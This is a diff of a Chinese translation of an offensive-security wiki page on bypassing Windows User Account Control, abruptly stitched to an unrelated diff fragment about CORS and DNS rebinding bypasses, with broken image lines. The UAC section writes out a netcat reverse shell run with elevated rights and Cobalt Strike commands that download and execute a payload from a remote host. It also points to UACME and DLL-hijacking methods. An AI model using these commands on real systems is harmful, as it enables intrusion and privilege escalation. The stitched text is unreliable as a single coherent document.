+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个功能,允许 **提升活动的同意提示**。应用程序具有不同的 `integrity` 级别,具有 **高级别** 的程序可以执行 **可能危害系统** 的任务。当 UAC 启用时,应用程序和任务始终 **在非管理员帐户的安全上下文中运行**,除非管理员明确授权这些应用程序/任务具有管理员级别的系统访问权限。它是一个便利功能,可以保护管理员免受意外更改,但不被视为安全边界。
有关完整性级别的更多信息:
@@ -31,104 +32,105 @@
[integrity-levels.md](../windows-local-privilege-escalation/integrity-levels.md)
{% endcontent-ref %}
-当UAC生效时,管理员用户会获得2个令牌:一个标准用户密钥,用于以常规级别执行常规操作,另一个带有管理员权限。
+当 UAC 生效时,管理员用户会获得 2 个令牌:一个标准用户密钥,用于以常规级别执行常规操作,以及一个具有管理员权限的密钥。
-这个[页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)深入讨论了UAC的工作原理,包括登录过程、用户体验和UAC架构。管理员可以使用安全策略来配置UAC在本地级别的工作方式(使用secpol.msc),或通过Active Directory域环境中的组策略对象(GPO)进行配置和推送。这里详细讨论了各种设置[here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)。有10个组策略设置可用于UAC。以下表格提供了额外的细节:
+此 [页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 深入讨论了 UAC 的工作原理,包括登录过程、用户体验和 UAC 架构。管理员可以使用安全策略在本地级别(使用 secpol.msc)配置 UAC 的工作方式,或通过组策略对象 (GPO) 在 Active Directory 域环境中配置并推送。各种设置在 [这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings) 进行了详细讨论。可以为 UAC 设置 10 个组策略设置。以下表格提供了更多详细信息:
-| Group Policy Setting | Registry Key | Default Setting |
+| 组策略设置 | 注册表项 | 默认设置 |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
-| [用户账户控制:内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
-| [用户账户控制:允许UIAccess应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
-| [用户账户控制:在管理员批准模式下的管理员提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
-| [用户账户控制:标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
-| [用户账户控制:检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
-| [用户账户控制:仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
-| [用户账户控制:仅提升已安装在安全位置的UIAccess应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
-| [用户账户控制:在管理员批准模式下运行所有管理员](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
-| [用户账户控制:在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
-| [用户账户控制:将文件和注册表写入失败虚拟化到每个用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Enabled |
-### UAC Bypass Theory
+| [用户帐户控制:内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | 禁用 |
+| [用户帐户控制:允许 UIAccess 应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | 禁用 |
+| [用户帐户控制:管理员在管理员批准模式下的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | 对非 Windows 二进制文件提示同意 |
+| [用户帐户控制:标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | 在安全桌面上提示凭据 |
+| [用户帐户控制:检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | 启用(家庭版默认)禁用(企业版默认) |
+| [用户帐户控制:仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | 禁用 |
+| [用户帐户控制:仅提升安装在安全位置的 UIAccess 应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | 启用 |
+| [用户帐户控制:在管理员批准模式下运行所有管理员](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | 启用 |
+| [用户帐户控制:在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | 启用 |
+| [用户帐户控制:将文件和注册表写入失败虚拟化到每用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | 启用 |
-一些程序如果用户属于管理员组,则会自动**自动提升权限**。这些可执行文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项,其值为 _**True**_。该可执行文件还必须由 Microsoft **签名**。
+### UAC 绕过理论
-因此,为了**绕过** **UAC**(从**中等**完整性级别提升到**高**级别),一些攻击者使用这种类型的可执行文件来**执行任意代码**,因为它将从**高级别完整性进程**中执行。
+如果 **用户属于** **管理员组**,某些程序会 **自动提升**。这些二进制文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项,值为 _**True**_。该二进制文件还必须 **由 Microsoft 签名**。
-您可以使用 Sysinternals 的工具 _**sigcheck.exe**_ 来**检查**可执行文件的 _**清单**_。您还可以使用 _Process Explorer_ 或 _Process Monitor_(Sysinternals 的工具)来**查看**进程的**完整性级别**。
+然后,为了 **绕过** **UAC**(从 **中等** 完整性级别 **提升到高**),一些攻击者使用这种二进制文件来 **执行任意代码**,因为它将从 **高完整性级别进程** 中执行。
-### Check UAC
+您可以使用 Sysinternals 的工具 _**sigcheck.exe**_ 检查二进制文件的 _**清单**_。您可以使用 _Process Explorer_ 或 _Process Monitor_(来自 Sysinternals)查看进程的 **完整性级别**。
-要确认 UAC 是否已启用,请执行以下操作:
+### 检查 UAC
+
+要确认 UAC 是否启用,请执行:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```
-如果是**`1`**,则UAC已**激活**;如果是**`0`**或**不存在**,则UAC为**未激活**。
+如果是 **`1`**,则 UAC 是 **激活** 的;如果是 **`0`** 或者 **不存在**,则 UAC 是 **未激活** 的。
-然后,检查已配置的**哪个级别**:
+然后,检查 **配置的级别**:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
```
-* 如果 **`0`**,那么 UAC 不会提示(类似于 **已禁用**)
-* 如果 **`1`**,管理员会被要求输入用户名和密码以使用高权限执行二进制文件(在安全桌面上)
-* 如果 **`2`**(**始终通知我**),当管理员尝试以高权限执行某些内容时,UAC 将始终要求管理员确认(在安全桌面上)
-* 如果 **`3`** 类似于 `1` 但不一定在安全桌面上
-* 如果 **`4`** 类似于 `2` 但不一定在安全桌面上
-* 如果 **`5`**(**默认**),它将要求管理员确认以以高权限运行非 Windows 二进制文件
+* 如果 **`0`**,则 UAC 不会提示(如 **禁用**)
+* 如果 **`1`**,则管理员会被 **要求输入用户名和密码** 以高权限执行二进制文件(在安全桌面上)
+* 如果 **`2`**(**始终通知我**),当管理员尝试以高权限执行某些操作时,UAC 将始终要求确认(在安全桌面上)
+* 如果 **`3`**,类似于 `1`,但不一定在安全桌面上
+* 如果 **`4`**,类似于 `2`,但不一定在安全桌面上
+* 如果 **`5`**(**默认**),它将要求管理员确认以高权限运行非 Windows 二进制文件
然后,您需要查看 **`LocalAccountTokenFilterPolicy`** 的值\
-如果值为 **`0`**,那么只有 **RID 500** 用户(**内置管理员**)能够在没有 UAC 的情况下执行 **管理员任务**,如果是 `1`,**"管理员"** 组内的所有帐户都可以执行这些任务。
+如果值为 **`0`**,则只有 **RID 500** 用户(**内置管理员**)能够在没有 UAC 的情况下执行 **管理员任务**,如果为 `1`,则 **“Administrators”** 组中的所有帐户都可以执行这些任务。
-最后,查看 **`FilterAdministratorToken`** 键的值\
-如果是 **`0`**(默认),**内置管理员帐户可以**执行远程管理任务,如果是 **`1`**,内置管理员帐户 **不能**执行远程管理任务,除非 `LocalAccountTokenFilterPolicy` 设置为 `1`。
+最后查看 **`FilterAdministratorToken`** 的键值\
+如果 **`0`**(默认),则 **内置管理员帐户可以** 执行远程管理任务,如果 **`1`**,则内置管理员帐户 **不能** 执行远程管理任务,除非 `LocalAccountTokenFilterPolicy` 设置为 `1`。
#### 总结
-* 如果 `EnableLUA=0` 或 **不存在**,**任何人都没有 UAC**
-* 如果 `EnableLua=1` 和 **`LocalAccountTokenFilterPolicy=1`,任何人都没有 UAC**
-* 如果 `EnableLua=1` 和 **`LocalAccountTokenFilterPolicy=0` 和 `FilterAdministratorToken=0`,RID 500(内置管理员)没有 UAC**
-* 如果 `EnableLua=1` 和 **`LocalAccountTokenFilterPolicy=0` 和 `FilterAdministratorToken=1`,所有人都有 UAC**
+* 如果 `EnableLUA=0` 或 **不存在**,**对任何人都没有 UAC**
+* 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=1`,对任何人都没有 UAC**
+* 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=0`,对 RID 500(内置管理员)没有 UAC**
+* 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=1`,对所有人都有 UAC**
-所有这些信息可以使用 **metasploit** 模块收集:`post/windows/gather/win_privs`
+所有这些信息可以通过 **metasploit** 模块收集:`post/windows/gather/win_privs`
您还可以检查用户的组并获取完整性级别:
```
net user %username%
whoami /groups | findstr Level
```
-## UAC绕过
+## UAC 绕过
{% hint style="info" %}
-请注意,如果您可以访问受害者的图形界面,则UAC绕过非常简单,因为您可以在UAC提示出现时直接点击“是”
+请注意,如果您可以图形访问受害者,UAC 绕过是直接的,因为您可以在 UAC 提示出现时简单地点击“是”
{% endhint %}
-在以下情况下需要UAC绕过:**UAC已激活,您的进程在中间完整性上下文中运行,并且您的用户属于管理员组**。
+在以下情况下需要 UAC 绕过:**UAC 已激活,您的进程在中等完整性上下文中运行,并且您的用户属于管理员组**。
-值得一提的是,**如果UAC处于最高安全级别(始终)状态,要绕过它要比在其他任何级别(默认)状态下要困难得多**。
+重要的是要提到,如果 UAC 处于最高安全级别(始终),则**绕过 UAC 要比在其他任何级别(默认)下要困难得多**。
-### UAC已禁用
+### UAC 禁用
-如果UAC已被禁用(`ConsentPromptBehaviorAdmin`为**`0`**),您可以使用类似以下内容的方法**以管理员权限(高完整性级别)执行反向Shell**:
+如果 UAC 已经禁用(`ConsentPromptBehaviorAdmin` 为 **`0`**),您可以使用类似的方式**以管理员权限执行反向 shell**(高完整性级别):
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
-#### 使用令牌复制绕过UAC
+#### UAC 绕过与令牌复制
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
-### **非常**基本的UAC“绕过”(完全文件系统访问)
+### **非常** 基本的 UAC "绕过"(完全文件系统访问)
-如果您拥有一个属于管理员组的用户的shell,您可以通过SMB(文件系统)本地挂载C$共享到新磁盘,然后您将可以访问文件系统中的所有内容(甚至管理员的主文件夹)。
+如果你有一个属于管理员组的用户的 shell,你可以 **通过 SMB 挂载 C$** 共享到一个新的磁盘上,这样你将 **访问文件系统中的所有内容**(甚至是管理员的主文件夹)。
{% hint style="warning" %}
-**看起来这个技巧不再起作用了**
+**看起来这个技巧不再有效**
{% endhint %}
```bash
net use Z: \\127.0.0.1\c$
@@ -137,9 +139,9 @@ cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
-### 使用 Cobalt Strike 绕过 UAC
+### UAC绕过与Cobalt Strike
-只有在 UAC 没有设置为最高安全级别时,Cobalt Strike 技术才能生效。
+Cobalt Strike技术仅在UAC未设置为最高安全级别时有效
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
@@ -151,18 +153,18 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
-**Empire**和**Metasploit**也有几个模块可以**绕过**用户账户控制(**UAC**)。
+**Empire** 和 **Metasploit** 也有几个模块可以 **绕过** **UAC**。
### KRBUACBypass
-文档和工具在[https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
+文档和工具在 [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
-### UAC绕过利用
+### UAC 绕过漏洞
-[**UACME**](https://github.com/hfiref0x/UACME)是几个UAC绕过利用的**编译**集合。请注意,您需要使用Visual Studio或MSBuild**编译UACME**。编译将创建几个可执行文件(如`Source\Akagi\outout\x64\Debug\Akagi.exe`),您需要知道**您需要哪一个**。\
-您应该**小心**,因为有些绕过会**提示其他程序**,这些程序会**警告用户**有事情发生。
+[**UACME** ](https://github.com/hfiref0x/UACME) 是几个 UAC 绕过漏洞的 **汇编**。请注意,您需要 **使用 Visual Studio 或 msbuild 编译 UACME**。编译将创建几个可执行文件(如 `Source\Akagi\outout\x64\Debug\Akagi.exe`),您需要知道 **您需要哪个**。\
+您应该 **小心**,因为某些绕过会 **提示其他程序**,这会 **警告** **用户** 有事情发生。
-UACME有每种技术开始生效的**构建版本**。您可以搜索影响您版本的技术:
+UACME 有 **每个技术开始工作的构建版本**。您可以搜索影响您版本的技术:
```
PS C:\> [environment]::OSVersion.Version
@@ -170,46 +172,61 @@ Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
-### 更多UAC绕过
+也可以使用 [这个](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) 页面获取 Windows 版本 `1607` 的构建版本。
-这个[页面](https://en.wikipedia.org/wiki/Windows\_10\_version\_history)可以获取Windows版本`1607`的构建版本。
+#### 更多 UAC 绕过
-**所有**在这里用于绕过AUC的技术**都需要**与受害者进行**完全交互的shell**(一个常见的nc.exe shell是不够的)。
+**所有**在这里使用的绕过 AUC 的技术 **都需要**与受害者的 **完整交互式 shell**(普通的 nc.exe shell 不够)。
-你可以使用**meterpreter**会话。迁移到一个**Session**值等于**1**的**进程**:
+您可以使用 **meterpreter** 会话获取。迁移到 **Session** 值等于 **1** 的 **进程**:
.png>)
-(_explorer.exe_应该有效)
+(_explorer.exe_ 应该可以工作)
-### 使用GUI的UAC绕过
+### 带 GUI 的 UAC 绕过
-如果你可以访问**GUI**,当你收到UAC提示时,你可以直接接受它,你不需要绕过它。因此,访问GUI将允许你绕过UAC。
+如果您可以访问 **GUI,您只需在出现 UAC 提示时接受它**,您实际上不需要绕过它。因此,获取对 GUI 的访问将允许您绕过 UAC。
-此外,如果你获得了某人正在使用的GUI会话(可能通过RDP),那里会有**一些作为管理员运行的工具**,你可以从中直接**以管理员身份运行**例如**cmd**,而不会再次被UAC提示,就像[**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更加**隐蔽**。
+此外,如果您获得了某人正在使用的 GUI 会话(可能通过 RDP),有 **一些工具将以管理员身份运行**,您可以 **直接以管理员身份运行** 例如 **cmd**,而无需再次被 UAC 提示,如 [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)。这可能会更 **隐蔽**。
-### 嘈杂的暴力UAC绕过
+### 嘈杂的暴力破解 UAC 绕过
-如果你不在乎嘈杂,你可以随时运行类似[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)这样的工具,**要求提升权限,直到用户接受为止**。
+如果您不在乎嘈杂,您可以始终 **运行类似** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) 的工具,它 **会请求提升权限,直到用户接受它**。
-### 你自己的绕过 - 基本UAC绕过方法论
+### 您自己的绕过 - 基本 UAC 绕过方法
-如果你查看**UACME**,你会注意到**大多数UAC绕过都滥用了Dll劫持漏洞**(主要是将恶意dll写入_C:\Windows\System32_)。[阅读此内容以了解如何找到Dll劫持漏洞](../windows-local-privilege-escalation/dll-hijacking.md)。
+如果您查看 **UACME**,您会注意到 **大多数 UAC 绕过利用 DLL 劫持漏洞**(主要是在 _C:\Windows\System32_ 中写入恶意 dll)。[阅读此内容以了解如何找到 DLL 劫持漏洞](../windows-local-privilege-escalation/dll-hijacking.md)。
-1. 找到一个将**自动提升权限**的二进制文件(检查当执行时它是否以高完整性级别运行)。
-2. 使用procmon找到可以受到**DLL劫持**攻击的“**NAME NOT FOUND**”事件。
-3. 你可能需要将DLL写入一些**受保护路径**(如C:\Windows\System32),在那里你没有写入权限。你可以通过以下方式绕过:
-1. **wusa.exe**:Windows 7、8和8.1。它允许在受保护路径内提取CAB文件的内容(因为此工具是以高完整性级别执行的)。
-2. **IFileOperation**:Windows 10。
-4. 准备一个**脚本**,将你的DLL复制到受保护路径内并执行易受攻击且自动提升权限的二进制文件。
+1. 找到一个会 **自动提升** 的二进制文件(检查它执行时是否以高完整性级别运行)。
+2. 使用 procmon 查找 "**NAME NOT FOUND**" 事件,这些事件可能会受到 **DLL 劫持** 的影响。
+3. 您可能需要在某些 **受保护路径**(如 C:\Windows\System32)中 **写入** DLL,而您没有写入权限。您可以通过以下方式绕过此限制:
+ 1. **wusa.exe**:Windows 7、8 和 8.1。它允许在受保护路径中提取 CAB 文件的内容(因为此工具是以高完整性级别执行的)。
+ 2. **IFileOperation**:Windows 10。
+4. 准备一个 **脚本**,将您的 DLL 复制到受保护路径中,并执行易受攻击的自动提升二进制文件。
-### 另一种UAC绕过技术
+### 另一种 UAC 绕过技术
-观察**自动提升权限的二进制文件**是否尝试从**注册表**中**读取**要**执行**的**二进制文件**或**命令**的**名称/路径**(如果二进制文件在**HKCU**内搜索此信息,则更有趣)。
+该技术是观察一个 **自动提升的二进制文件** 是否尝试 **从注册表** 中 **读取** 要 **执行** 的 **二进制文件** 或 **命令** 的 **名称/路径**(如果二进制文件在 **HKCU** 中搜索此信息,则更有趣)。
-使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流**,使用全球**最先进**的社区工具。\
-立即获取访问权限:
+使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
+今天获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+
+{% hint style="success" %}
+学习和实践 AWS 黑客攻击:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客攻击: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+支持 HackTricks
+
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+
+
+{% endhint %}
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
{% endhint %}
-有关更多信息,请查看 [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
-### 其他常见绕过方式
+有关更多信息,您可以查看[https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
-* 如果**不允许内部IP**,可能会**忘记禁止0.0.0.0**(适用于Linux和Mac)
-* 如果**不允许内部IP**,可以响应一个**CNAME**到**localhost**(适用于Linux和Mac)
-* 如果**不允许内部IP**作为DNS响应,可以响应**CNAME到内部服务**,如www.corporate.internal。
+### Other Common Bypasses
-### 武器化的DNS Rebinding
+* 如果**不允许内部IP**,他们可能**忘记禁止0.0.0.0**(在Linux和Mac上有效)
+* 如果**不允许内部IP**,则响应**CNAME**到**localhost**(在Linux和Mac上有效)
+* 如果**不允许内部IP**作为DNS响应,您可以响应**CNAME到内部服务**,例如www.corporate.internal。
-您可以在演讲[Gerald Doussot - DNS Rebinding攻击的现状和起源的独特性 - DEF CON 27大会](https://www.youtube.com/watch?v=y9-0lICNjOQ)中找到有关先前绕过技术以及如何使用以下工具的更多信息。
+### DNS Rebidding Weaponized
-[**`起源的独特性`**](https://github.com/nccgroup/singularity)是一个用于执行[DNS Rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding)攻击的工具。它包括重新绑定攻击服务器DNS名称的IP地址到目标机器的IP地址以及提供攻击载荷以利用目标机器上的易受攻击软件所需的组件。
+您可以在演讲[Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - DEF CON 27 Conference](https://www.youtube.com/watch?v=y9-0lICNjOQ)中找到有关先前绕过技术的更多信息以及如何使用以下工具。
-### 针对DNS Rebinding的真实保护
+[**`Singularity of Origin`**](https://github.com/nccgroup/singularity)是一个执行[DNS重绑定](https://en.wikipedia.org/wiki/DNS\_rebinding)攻击的工具。它包括将攻击服务器DNS名称的IP地址重新绑定到目标机器的IP地址并提供攻击有效载荷以利用目标机器上脆弱软件所需的组件。
+
+### Real Protection against DNS Rebinding
* 在内部服务中使用TLS
* 请求身份验证以访问数据
-* 验证主机头
-* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): 建议当公共服务器想要访问内部服务器时始终发送预检请求
+* 验证Host头
+* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/):提议在公共服务器想要访问内部服务器时始终发送预检请求
-## **工具**
+## **Tools**
-**模糊CORS策略中可能的配置错误**
+**Fuzz可能的CORS政策配置错误**
* [https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8](https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8)
* [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
@@ -369,7 +371,7 @@ DNS 重绑定可用于绕过受害者执行的显式 IP 检查,或者用于用
* [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe)
* [https://github.com/omranisecurity/CorsOne](https://github.com/omranisecurity/CorsOne)
-## 参考资料
+## References
* [https://portswigger.net/web-security/cors](https://portswigger.net/web-security/cors)
* [https://portswigger.net/web-security/cors/access-control-allow-origin](https://portswigger.net/web-security/cors/access-control-allow-origin)
@@ -385,16 +387,17 @@ DNS 重绑定可用于绕过受害者执行的显式 IP 检查,或者用于用
{% embed url="https://websec.nl/" %}
+{% hint style="success" %}
+学习和实践AWS黑客攻击:
.png)
.png)
.png)
 (1).png)